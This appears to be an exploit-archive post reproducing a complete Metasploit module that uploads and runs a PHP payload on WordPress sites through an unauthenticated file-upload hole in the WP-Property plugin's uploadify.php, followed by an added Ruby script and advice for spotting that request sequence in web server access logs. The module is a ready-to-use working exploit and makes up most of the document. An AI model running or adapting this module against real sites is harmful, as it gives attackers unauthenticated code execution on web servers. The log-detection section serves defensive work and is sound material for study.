WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
            'Description'    => %q{
                    This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
                plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
                temp directory without authentication, which results in arbitrary code execution.
            },
            'Author'         =>
                [
                    'Sammy FORGIT', # initial discovery
                    'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '82656' ],
                    [ 'BID', '53787' ],
                    [ 'EDB', '18987'],
                    [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 26 2012'))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
            ], self.class)
    end

    def check
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        res = send_request_cgi({
            'method' => 'GET',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
        })

        if not res or res.code != 200
            return Exploit::CheckCode::Unknown
        end

        return Exploit::CheckCode::Appears
    end

    def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'   => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{@payload_name}/
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        upload_uri = res.body

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
            'uri'    => upload_uri,
            'method' => 'GET'
        })
    end
end
Don't ask me what this code is or how to use it. I'm talking about msf.
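For defenders, the module's request sequence (GET then POST to uploadify.php, followed by a GET for a `.php` file in the same directory) is easy to spot in web server logs. The following is an added example, not part of the original post or of Metasploit; it assumes the "combined" access-log format and that uploads land in the uploadify directory as the module's `folder` value requests, and the sample log lines, IPs and file names are constructed.

```ruby
# Added example: log triage for the request pattern of the module above.
# Assumes "combined" access-log format; all sample lines are constructed.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'.freeze
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<verb>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) /

# Returns one hash per suspicious line: { line:, ip:, kind:, path: }.
def scan_access_log(lines)
  uploaders = {} # client IPs that have POSTed to uploadify.php
  findings = []
  lines.each_with_index do |raw, idx|
    m = LOG_RE.match(raw)
    next unless m
    path = m[:path].split('?', 2).first.to_s
    pos = path.index(UPLOADIFY_DIR)
    next unless pos
    file = path[(pos + UPLOADIFY_DIR.length)..-1]
    kind = nil
    if file == 'uploadify.php'
      kind = :probe if m[:verb] == 'GET'
      if m[:verb] == 'POST'
        uploaders[m[:ip]] = true
        kind = :upload
      end
    elsif file =~ /\.ph(p\d?|tml)\z/i && m[:status] == '200'
      # Any other PHP file served from the upload directory is suspect;
      # a prior upload by the same client matches the module's sequence.
      kind = uploaders[m[:ip]] ? :uploaded_script_run : :script_in_upload_dir
    end
    findings << { line: idx + 1, ip: m[:ip], kind: kind, path: path } if kind
  end
  findings
end

# Constructed sample log (documentation IP ranges, made-up file names).
def sample_log
  base = "/wordpress/#{UPLOADIFY_DIR}"
  row = lambda do |ip, verb, path, status|
    %(#{ip} - - [04/Jan/2013:19:40:01 +0800] "#{verb} #{path} HTTP/1.1" #{status} 0 "-" "-")
  end
  [row.call('198.51.100.7', 'GET', "#{base}uploadify.php", 200),
   row.call('198.51.100.7', 'POST', "#{base}uploadify.php", 200),
   row.call('198.51.100.7', 'GET', "#{base}aBcDe.php", 200),
   row.call('192.0.2.10', 'GET', '/wordpress/index.php', 200),
   row.call('192.0.2.10', 'GET', "#{base}uploadify.swf", 200),
   row.call('203.0.113.5', 'GET', "#{base}xyzzy.php", 200)]
end

scan_access_log(sample_log).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

Because the uploaded payload is created with `:unlink_self=>true`, the file is usually gone by the time anyone looks at the disk, so the access log is the more reliable evidence. Any other PHP file the plugin legitimately ships in that directory should be allowlisted before alerting on `:script_in_upload_dir`.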